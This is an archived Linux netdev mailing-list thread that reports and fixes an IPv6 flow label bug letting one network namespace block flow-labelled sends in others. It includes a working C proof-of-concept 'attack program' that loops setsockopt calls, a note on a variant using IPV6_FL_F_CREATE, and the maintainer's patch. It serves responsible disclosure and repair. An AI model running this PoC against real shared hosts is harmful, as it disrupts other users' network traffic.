netdev.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* BUG: potential net namespace bug in IPv6 flow label management
@ 2022-02-13 10:31 Liu, Congyu
  2022-02-13 16:10 ` Willem de Bruijn
  0 siblings, 1 reply; 5+ messages in thread
From: Liu, Congyu @ 2022-02-13 10:31 UTC (permalink / raw)
  To: willemb, security, oss-security, netdev


Hi,

In the test conducted on namespace, I found that one unsuccessful IPv6 flow label 
management from one net ns could stop other net ns's data transmission that requests 
flow label for a short time. Specifically, in our test case, one unsuccessful 
`setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label 
set in cmsg. Simple PoC is included for verification. The behavior descirbed above 
can be reproduced in latest kernel.

I managed to figure out the data flow behind this: when asking to get a flow label, 
some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create` 
to allocate an exclusive flow label, then call `fl_release` to release it before returning 
-ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps 
track of number of alive exclusive flow labels, will get increased instantly after calling 
`fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease 
sometime later after calling `fl_decrease`. During this period, if data transmission function 
in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive` 
will invoke the `__fl_lookup`. In the test case observed, this function returns error and 
eventually stops the data transmission.

I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called 
continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC 
provided, if attack and victim programs are running simutaneously, victim program cannot transmit 
data; when running without attack program, the victim program can transmit data normally.

Thanks,
Congyu




Attack Program:

#define _GNU_SOURCE
#include <linux/in6.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <error.h>
#include <errno.h>
#include <sched.h>
#include <stdbool.h>


int main() {
	int fd1, ret, pid;
	unshare(CLONE_NEWNET);
	if ((fd1 = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDPLITE)) < 0)
		error(1, errno, "socket");
	struct in6_flowlabel_req req = {
		.flr_action = IPV6_FL_A_GET,
		.flr_label = 0,
		.flr_flags = 0,
		.flr_share = IPV6_FL_S_USER,
	};
	req.flr_dst.s6_addr[0] = 0xfd;
 	req.flr_dst.s6_addr[15] = 0x1;

	while(1) {
		ret = setsockopt(fd1, SOL_IPV6, IPV6_FLOWLABEL_MGR, &req, sizeof(req));
	}

	return 0;
}



Victim program:

#define _GNU_SOURCE
#include <linux/in6.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <error.h>
#include <errno.h>
#include <sched.h>
#include <stdbool.h>

static const char cfg_data[] = "a";

static void do_send(int fd, struct sockaddr_in6 addr, bool with_flowlabel, uint32_t flowlabel)
 {
 	char control[CMSG_SPACE(sizeof(flowlabel))] = {0};
 	struct msghdr msg = {0};
 	struct iovec iov = {0};
 	int ret;

 	iov.iov_base = (char *)cfg_data;
 	iov.iov_len = sizeof(cfg_data);

 	msg.msg_iov = &iov;
 	msg.msg_iovlen = 1;
	msg.msg_name = &addr;
	msg.msg_namelen = sizeof(addr);

 	if (with_flowlabel) {
 		struct cmsghdr *cm;

 		cm = (void *)control;
 		cm->cmsg_len = CMSG_LEN(sizeof(flowlabel));
 		cm->cmsg_level = SOL_IPV6;
 		cm->cmsg_type = IPV6_FLOWINFO;
 		*(uint32_t *)CMSG_DATA(cm) = htonl(flowlabel);

 		msg.msg_control = control;
 		msg.msg_controllen = sizeof(control);
 	}

 	ret = sendmsg(fd, &msg, 0);

	fprintf(stderr, "sendmsg ret = %d\n", ret);
}

static void do_recv(int fd, bool with_flowlabel, uint32_t expect)
 {
 	char control[CMSG_SPACE(sizeof(expect))];
 	char data[sizeof(cfg_data)];
 	struct msghdr msg = {0};
 	struct iovec iov = {0};
 	struct cmsghdr *cm;
 	uint32_t flowlabel;
 	int ret;

 	iov.iov_base = data;
 	iov.iov_len = sizeof(data);

 	msg.msg_iov = &iov;
 	msg.msg_iovlen = 1;


 	memset(control, 0, sizeof(control));
 	msg.msg_control = control;
 	msg.msg_controllen = sizeof(control);

 	recvmsg(fd, &msg, 0);
}

int main() {
	int fd1, ret, pid;
	unshare(CLONE_NEWNET);
	pid = fork();
	if (pid == 0) {
		execlp("ip", "ip", "link", "set", "dev", "lo", "up", NULL);
	}
	sleep(1);
	struct sockaddr_in6 src_addr = {
 		.sin6_family = AF_INET6,
 		.sin6_port = htons(7000),
 		.sin6_addr = in6addr_loopback,
		.sin6_flowinfo = htonl(0),
		.sin6_scope_id = 0,
 	};
	struct sockaddr_in6 dst_addr = {
 		.sin6_family = AF_INET6,
 		.sin6_port = htons(8000),
 		.sin6_addr = in6addr_loopback,
		.sin6_flowinfo = htonl(0),
		.sin6_scope_id = 0,
 	};
	pid = fork();
	int fd2;
	if (pid == 0) {
		if((fd2 = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP)) < 0)
			error(1, errno, "socket");
		if(bind(fd2, (void *)&dst_addr, sizeof(dst_addr)) < 0)
			error(1, errno, "bind");
		while(1) {
			do_recv(fd2, true, 123456);
		}
		return 0;
		
	}
	sleep(1);
	if((fd2 = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP)) < 0)
 		error(1, errno, "socket");
	while(1) {
		do_send(fd2, dst_addr, true, 123456);
		usleep(100000);
	}

	return 0;
}

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: BUG: potential net namespace bug in IPv6 flow label management
  2022-02-13 10:31 BUG: potential net namespace bug in IPv6 flow label management Liu, Congyu
@ 2022-02-13 16:10 ` Willem de Bruijn
  2022-02-13 23:47   ` Willem de Bruijn
  0 siblings, 1 reply; 5+ messages in thread
From: Willem de Bruijn @ 2022-02-13 16:10 UTC (permalink / raw)
  To: Liu, Congyu; +Cc: security, oss-security, netdev

On Sun, Feb 13, 2022 at 5:31 AM Liu, Congyu <liu3101@purdue.edu> wrote:
>
>
> Hi,
>
> In the test conducted on namespace, I found that one unsuccessful IPv6 flow label
> management from one net ns could stop other net ns's data transmission that requests
> flow label for a short time. Specifically, in our test case, one unsuccessful
> `setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label
> set in cmsg. Simple PoC is included for verification. The behavior descirbed above
> can be reproduced in latest kernel.
>
> I managed to figure out the data flow behind this: when asking to get a flow label,
> some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create`
> to allocate an exclusive flow label, then call `fl_release` to release it before returning
> -ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps
> track of number of alive exclusive flow labels, will get increased instantly after calling
> `fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease
> sometime later after calling `fl_decrease`. During this period, if data transmission function
> in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive`
> will invoke the `__fl_lookup`. In the test case observed, this function returns error and
> eventually stops the data transmission.
>
> I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called
> continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC
> provided, if attack and victim programs are running simutaneously, victim program cannot transmit
> data; when running without attack program, the victim program can transmit data normally.

Thanks for the clear explanation.

Being able to use flowlabels without explicitly registering them
through a setsockopt is a fast path optimization introduced in commit
59c820b2317f ("ipv6: elide flowlabel check if no exclusive leases
exist").

Before this, any use of flowlabels required registering them, whether
the use was exclusive or not. As autoflowlabels already skipped this
stateful action, the commit extended this fast path to all non-exclusive
use. But if any exclusive flowlabel is active, to protect it, all
other flowlabel use has to be registered too.

The commit message does state

    This is an optimization. Robust applications still have to revert to
    requesting leases if the fast path fails due to an exclusive lease.

Though I can see how the changed behavior has changed the perception of the API.

That this extends up to a second after release of the last exclusive
flowlabel due to deferred release is only tangential to the issue?

Flowlabels are stored globally, but associated with a netns
(fl->fl_net). Perhaps we can add a per-netns check to the
static_branch and maintain stateless behavior in other netns, even if
some netns maintain exclusive leases.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: BUG: potential net namespace bug in IPv6 flow label management
  2022-02-13 16:10 ` Willem de Bruijn
@ 2022-02-13 23:47   ` Willem de Bruijn
  2022-02-14  0:48     ` Willem de Bruijn
  0 siblings, 1 reply; 5+ messages in thread
From: Willem de Bruijn @ 2022-02-13 23:47 UTC (permalink / raw)
  To: Willem de Bruijn; +Cc: Liu, Congyu, security, netdev

On Sun, Feb 13, 2022 at 11:10 AM Willem de Bruijn
<willemdebruijn.kernel@gmail.com> wrote:
>
> On Sun, Feb 13, 2022 at 5:31 AM Liu, Congyu <liu3101@purdue.edu> wrote:
> >
> >
> > Hi,
> >
> > In the test conducted on namespace, I found that one unsuccessful IPv6 flow label
> > management from one net ns could stop other net ns's data transmission that requests
> > flow label for a short time. Specifically, in our test case, one unsuccessful
> > `setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label
> > set in cmsg. Simple PoC is included for verification. The behavior descirbed above
> > can be reproduced in latest kernel.
> >
> > I managed to figure out the data flow behind this: when asking to get a flow label,
> > some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create`
> > to allocate an exclusive flow label, then call `fl_release` to release it before returning
> > -ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps
> > track of number of alive exclusive flow labels, will get increased instantly after calling
> > `fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease
> > sometime later after calling `fl_decrease`. During this period, if data transmission function
> > in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive`
> > will invoke the `__fl_lookup`. In the test case observed, this function returns error and
> > eventually stops the data transmission.
> >
> > I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called
> > continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC
> > provided, if attack and victim programs are running simutaneously, victim program cannot transmit
> > data; when running without attack program, the victim program can transmit data normally.
>
> Thanks for the clear explanation.
>
> Being able to use flowlabels without explicitly registering them
> through a setsockopt is a fast path optimization introduced in commit
> 59c820b2317f ("ipv6: elide flowlabel check if no exclusive leases
> exist").
>
> Before this, any use of flowlabels required registering them, whether
> the use was exclusive or not. As autoflowlabels already skipped this
> stateful action, the commit extended this fast path to all non-exclusive
> use. But if any exclusive flowlabel is active, to protect it, all
> other flowlabel use has to be registered too.
>
> The commit message does state
>
>     This is an optimization. Robust applications still have to revert to
>     requesting leases if the fast path fails due to an exclusive lease.
>
> Though I can see how the changed behavior has changed the perception of the API.
>
> That this extends up to a second after release of the last exclusive
> flowlabel due to deferred release is only tangential to the issue?
>
> Flowlabels are stored globally, but associated with a netns
> (fl->fl_net). Perhaps we can add a per-netns check to the
> static_branch and maintain stateless behavior in other netns, even if
> some netns maintain exclusive leases.

The specific issue could be avoided by moving

       if (fl_shared_exclusive(fl) || fl->opt)
               static_branch_deferred_inc(&ipv6_flowlabel_exclusive);

until later in ipv6_flowlabel_get, after the ENOENT response.

But reserving a flowlabel is not a privileged operation, including for
exclusive use. So the attack program can just be revised to pass
IPV6_FL_F_CREATE and hold a real reservation. Then it also does
not have to retry in a loop.

The drop behavior is fully under control of the victim. If it reserves
the flowlabel it intends to use, then the issue does not occur. For
this reason I don't see this as a vulnerability.

But the behavior is non-obvious and it is preferable to isolate netns
from each other. I'm looking into whether we can add a per-netns
"has exclusive leases" check.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: BUG: potential net namespace bug in IPv6 flow label management
  2022-02-13 23:47   ` Willem de Bruijn
@ 2022-02-14  0:48     ` Willem de Bruijn
  2022-02-14  1:36       ` Liu, Congyu
  0 siblings, 1 reply; 5+ messages in thread
From: Willem de Bruijn @ 2022-02-14  0:48 UTC (permalink / raw)
  To: Willem de Bruijn; +Cc: Liu, Congyu, security, netdev

On Sun, Feb 13, 2022 at 6:47 PM Willem de Bruijn
<willemdebruijn.kernel@gmail.com> wrote:
>
> On Sun, Feb 13, 2022 at 11:10 AM Willem de Bruijn
> <willemdebruijn.kernel@gmail.com> wrote:
> >
> > On Sun, Feb 13, 2022 at 5:31 AM Liu, Congyu <liu3101@purdue.edu> wrote:
> > >
> > >
> > > Hi,
> > >
> > > In the test conducted on namespace, I found that one unsuccessful IPv6 flow label
> > > management from one net ns could stop other net ns's data transmission that requests
> > > flow label for a short time. Specifically, in our test case, one unsuccessful
> > > `setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label
> > > set in cmsg. Simple PoC is included for verification. The behavior descirbed above
> > > can be reproduced in latest kernel.
> > >
> > > I managed to figure out the data flow behind this: when asking to get a flow label,
> > > some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create`
> > > to allocate an exclusive flow label, then call `fl_release` to release it before returning
> > > -ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps
> > > track of number of alive exclusive flow labels, will get increased instantly after calling
> > > `fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease
> > > sometime later after calling `fl_decrease`. During this period, if data transmission function
> > > in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive`
> > > will invoke the `__fl_lookup`. In the test case observed, this function returns error and
> > > eventually stops the data transmission.
> > >
> > > I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called
> > > continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC
> > > provided, if attack and victim programs are running simutaneously, victim program cannot transmit
> > > data; when running without attack program, the victim program can transmit data normally.
> >
> > Thanks for the clear explanation.
> >
> > Being able to use flowlabels without explicitly registering them
> > through a setsockopt is a fast path optimization introduced in commit
> > 59c820b2317f ("ipv6: elide flowlabel check if no exclusive leases
> > exist").
> >
> > Before this, any use of flowlabels required registering them, whether
> > the use was exclusive or not. As autoflowlabels already skipped this
> > stateful action, the commit extended this fast path to all non-exclusive
> > use. But if any exclusive flowlabel is active, to protect it, all
> > other flowlabel use has to be registered too.
> >
> > The commit message does state
> >
> >     This is an optimization. Robust applications still have to revert to
> >     requesting leases if the fast path fails due to an exclusive lease.
> >
> > Though I can see how the changed behavior has changed the perception of the API.
> >
> > That this extends up to a second after release of the last exclusive
> > flowlabel due to deferred release is only tangential to the issue?
> >
> > Flowlabels are stored globally, but associated with a netns
> > (fl->fl_net). Perhaps we can add a per-netns check to the
> > static_branch and maintain stateless behavior in other netns, even if
> > some netns maintain exclusive leases.
>
> The specific issue could be avoided by moving
>
>        if (fl_shared_exclusive(fl) || fl->opt)
>                static_branch_deferred_inc(&ipv6_flowlabel_exclusive);
>
> until later in ipv6_flowlabel_get, after the ENOENT response.
>
> But reserving a flowlabel is not a privileged operation, including for
> exclusive use. So the attack program can just be revised to pass
> IPV6_FL_F_CREATE and hold a real reservation. Then it also does
> not have to retry in a loop.
>
> The drop behavior is fully under control of the victim. If it reserves
> the flowlabel it intends to use, then the issue does not occur. For
> this reason I don't see this as a vulnerability.
>
> But the behavior is non-obvious and it is preferable to isolate netns
> from each other. I'm looking into whether we can add a per-netns
> "has exclusive leases" check.

Easiest is just to mark the netns as requiring the check only once it
starts having exclusive labels:

+++ b/include/net/ipv6.h
@@ -399,7 +399,8 @@ extern struct static_key_false_deferred
ipv6_flowlabel_exclusive;
 static inline struct ip6_flowlabel *fl6_sock_lookup(struct sock *sk,
                                                    __be32 label)
 {
-       if (static_branch_unlikely(&ipv6_flowlabel_exclusive.key))
+       if (static_branch_unlikely(&ipv6_flowlabel_exclusive.key) &&
+           READ_ONCE(sock_net(sk)->ipv6.flowlabel_has_excl))
                return __fl6_sock_lookup(sk, label) ? : ERR_PTR(-ENOENT);

@@ -77,9 +77,10 @@ struct netns_ipv6 {
        spinlock_t              fib6_gc_lock;
        unsigned int             ip6_rt_gc_expire;
        unsigned long            ip6_rt_last_gc;
+       unsigned char           flowlabel_has_excl;
 #ifdef CONFIG_IPV6_MULTIPLE_TABLES
-       unsigned int            fib6_rules_require_fldissect;
        bool                    fib6_has_custom_rules;
+       unsigned int            fib6_rules_require_fldissect;

+++ b/net/ipv6/ip6_flowlabel.c
@@ -450,8 +450,10 @@ fl_create(struct net *net, struct sock *sk,
struct in6_flowlabel_req *freq,
                err = -EINVAL;
                goto done;
        }
-       if (fl_shared_exclusive(fl) || fl->opt)
+       if (fl_shared_exclusive(fl) || fl->opt) {
+               WRITE_ONCE(sock_net(sk)->ipv6.flowlabel_has_excl, 1);
                static_branch_deferred_inc(&ipv6_flowlabel_exclusive);
+       }
        return fl;

Clearing flowlabel_has_excl when it stops using labels is more complex,
requiring either an atomic_t or walking the entire flowlabel hashtable on
each flowlabel free in the namespace. It can be skipped.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: BUG: potential net namespace bug in IPv6 flow label management
  2022-02-14  0:48     ` Willem de Bruijn
@ 2022-02-14  1:36       ` Liu, Congyu
  0 siblings, 0 replies; 5+ messages in thread
From: Liu, Congyu @ 2022-02-14  1:36 UTC (permalink / raw)
  To: Willem de Bruijn; +Cc: security, netdev

Thank you! I just tested the patch using previous PoC. The bug is fixed.

Thanks,
Congyu
________________________________________
From: Willem de Bruijn <willemdebruijn.kernel@gmail.com>
Sent: Sunday, February 13, 2022 19:48
To: Willem de Bruijn
Cc: Liu, Congyu; security@kernel.org; netdev@vger.kernel.org
Subject: Re: BUG: potential net namespace bug in IPv6 flow label management

On Sun, Feb 13, 2022 at 6:47 PM Willem de Bruijn
<willemdebruijn.kernel@gmail.com> wrote:
>
> On Sun, Feb 13, 2022 at 11:10 AM Willem de Bruijn
> <willemdebruijn.kernel@gmail.com> wrote:
> >
> > On Sun, Feb 13, 2022 at 5:31 AM Liu, Congyu <liu3101@purdue.edu> wrote:
> > >
> > >
> > > Hi,
> > >
> > > In the test conducted on namespace, I found that one unsuccessful IPv6 flow label
> > > management from one net ns could stop other net ns's data transmission that requests
> > > flow label for a short time. Specifically, in our test case, one unsuccessful
> > > `setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label
> > > set in cmsg. Simple PoC is included for verification. The behavior descirbed above
> > > can be reproduced in latest kernel.
> > >
> > > I managed to figure out the data flow behind this: when asking to get a flow label,
> > > some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create`
> > > to allocate an exclusive flow label, then call `fl_release` to release it before returning
> > > -ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps
> > > track of number of alive exclusive flow labels, will get increased instantly after calling
> > > `fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease
> > > sometime later after calling `fl_decrease`. During this period, if data transmission function
> > > in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive`
> > > will invoke the `__fl_lookup`. In the test case observed, this function returns error and
> > > eventually stops the data transmission.
> > >
> > > I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called
> > > continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC
> > > provided, if attack and victim programs are running simutaneously, victim program cannot transmit
> > > data; when running without attack program, the victim program can transmit data normally.
> >
> > Thanks for the clear explanation.
> >
> > Being able to use flowlabels without explicitly registering them
> > through a setsockopt is a fast path optimization introduced in commit
> > 59c820b2317f ("ipv6: elide flowlabel check if no exclusive leases
> > exist").
> >
> > Before this, any use of flowlabels required registering them, whether
> > the use was exclusive or not. As autoflowlabels already skipped this
> > stateful action, the commit extended this fast path to all non-exclusive
> > use. But if any exclusive flowlabel is active, to protect it, all
> > other flowlabel use has to be registered too.
> >
> > The commit message does state
> >
> >     This is an optimization. Robust applications still have to revert to
> >     requesting leases if the fast path fails due to an exclusive lease.
> >
> > Though I can see how the changed behavior has changed the perception of the API.
> >
> > That this extends up to a second after release of the last exclusive
> > flowlabel due to deferred release is only tangential to the issue?
> >
> > Flowlabels are stored globally, but associated with a netns
> > (fl->fl_net). Perhaps we can add a per-netns check to the
> > static_branch and maintain stateless behavior in other netns, even if
> > some netns maintain exclusive leases.
>
> The specific issue could be avoided by moving
>
>        if (fl_shared_exclusive(fl) || fl->opt)
>                static_branch_deferred_inc(&ipv6_flowlabel_exclusive);
>
> until later in ipv6_flowlabel_get, after the ENOENT response.
>
> But reserving a flowlabel is not a privileged operation, including for
> exclusive use. So the attack program can just be revised to pass
> IPV6_FL_F_CREATE and hold a real reservation. Then it also does
> not have to retry in a loop.
>
> The drop behavior is fully under control of the victim. If it reserves
> the flowlabel it intends to use, then the issue does not occur. For
> this reason I don't see this as a vulnerability.
>
> But the behavior is non-obvious and it is preferable to isolate netns
> from each other. I'm looking into whether we can add a per-netns
> "has exclusive leases" check.

Easiest is just to mark the netns as requiring the check only once it
starts having exclusive labels:

+++ b/include/net/ipv6.h
@@ -399,7 +399,8 @@ extern struct static_key_false_deferred
ipv6_flowlabel_exclusive;
 static inline struct ip6_flowlabel *fl6_sock_lookup(struct sock *sk,
                                                    __be32 label)
 {
-       if (static_branch_unlikely(&ipv6_flowlabel_exclusive.key))
+       if (static_branch_unlikely(&ipv6_flowlabel_exclusive.key) &&
+           READ_ONCE(sock_net(sk)->ipv6.flowlabel_has_excl))
                return __fl6_sock_lookup(sk, label) ? : ERR_PTR(-ENOENT);

@@ -77,9 +77,10 @@ struct netns_ipv6 {
        spinlock_t              fib6_gc_lock;
        unsigned int             ip6_rt_gc_expire;
        unsigned long            ip6_rt_last_gc;
+       unsigned char           flowlabel_has_excl;
 #ifdef CONFIG_IPV6_MULTIPLE_TABLES
-       unsigned int            fib6_rules_require_fldissect;
        bool                    fib6_has_custom_rules;
+       unsigned int            fib6_rules_require_fldissect;

+++ b/net/ipv6/ip6_flowlabel.c
@@ -450,8 +450,10 @@ fl_create(struct net *net, struct sock *sk,
struct in6_flowlabel_req *freq,
                err = -EINVAL;
                goto done;
        }
-       if (fl_shared_exclusive(fl) || fl->opt)
+       if (fl_shared_exclusive(fl) || fl->opt) {
+               WRITE_ONCE(sock_net(sk)->ipv6.flowlabel_has_excl, 1);
                static_branch_deferred_inc(&ipv6_flowlabel_exclusive);
+       }
        return fl;

Clearing flowlabel_has_excl when it stops using labels is more complex,
requiring either an atomic_t or walking the entire flowlabel hashtable on
each flowlabel free in the namespace. It can be skipped.

^ permalink raw reply	[flat|nested] 5+ messages in thread

end of thread, other threads:[~2022-02-14  1:36 UTC | newest]

Thread overview: 5+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2022-02-13 10:31 BUG: potential net namespace bug in IPv6 flow label management Liu, Congyu
2022-02-13 16:10 ` Willem de Bruijn
2022-02-13 23:47   ` Willem de Bruijn
2022-02-14  0:48     ` Willem de Bruijn
2022-02-14  1:36       ` Liu, Congyu

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).